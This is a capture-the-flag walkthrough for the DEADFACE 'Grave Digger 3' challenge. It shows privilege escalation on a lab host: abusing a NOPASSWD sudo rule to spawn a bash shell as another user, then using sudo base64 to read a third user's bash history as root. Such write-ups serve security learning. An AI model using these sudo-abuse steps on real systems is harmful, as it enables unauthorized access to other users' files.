There is one more flag that DEADFACE has hidden on d34th
’s machine. Somehow, you’ll have to find a way to access d34th
’s files in his home directory. Submit the flag as flag{flag text} Password: 123456789q
Use context from Grave Digger 1 and Grave Digger 2
Exfiltrating the binary and reverse engineering it (or just reading the man page) shows existence of a flag that can be used to run an arbitrary command.
-c, --command COMMAND
Execute a command (for troubleshooting purposes ONLY).
In this man page we also find the email address for lilith which is used for Contact
Lilith ([email protected])
Additionally, crypto_vamp
can run /opt/reader
as lilith with NOPASSWD
crypto_vamp@da4c4c0c34da:~$ sudo -l
Matching Defaults entries for crypto_vamp on da4c4c0c34da:
env_reset, mail_badpass,
User crypto_vamp may run the following commands on da4c4c0c34da:
(lilith) NOPASSWD: /opt/reader
We can leverage this to escalate to a shell as lilith.
crypto_vamp@da4c4c0c34da:~$ sudo -u lilith /opt/reader -c /bin/bash
lilith@da4c4c0c34da:~$ id
1: uid=4817(lilith) gid=4817(lilith) groups=4817(lilith),4818(deadface)
Lilith has several utilities that can be used to read arbitrary files as the root user:
lilith@da4c4c0c34da:~$ sudo -l
2: Matching Defaults entries for lilith on da4c4c0c34da:
3: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sb4: in\:/bin\:/snap/bin
6: User lilith may run the following commands on da4c4c0c34da:
7: (ALL) NOPASSWD: /usr/bin/base64
8: (ALL) NOPASSWD: /usr/bin/gzip
9: (ALL) NOPASSWD: /user/bin/gunzip
We can use this to read spookyboi’s bash history.
lilith@da4c4c0c34da:~$ sudo base64 /home/spookyboi/.bash_history | base64 -d
10: ls -l
11: cd ~
12: mkdir docs
13: rm -rf docs
14: wget > gravedigger3.txt
15: rm gravedigger3.txt
16: openssl genrsa -aes128 -out spookyboi-priv.pem 1024
17: openssl rsa -in spookyboi-priv.pem -pubout > spookyboi-public.pem
18: rm spookyboi-public.pem
19: mv *.pem .keys/
Following the pastebin link gives us the flag.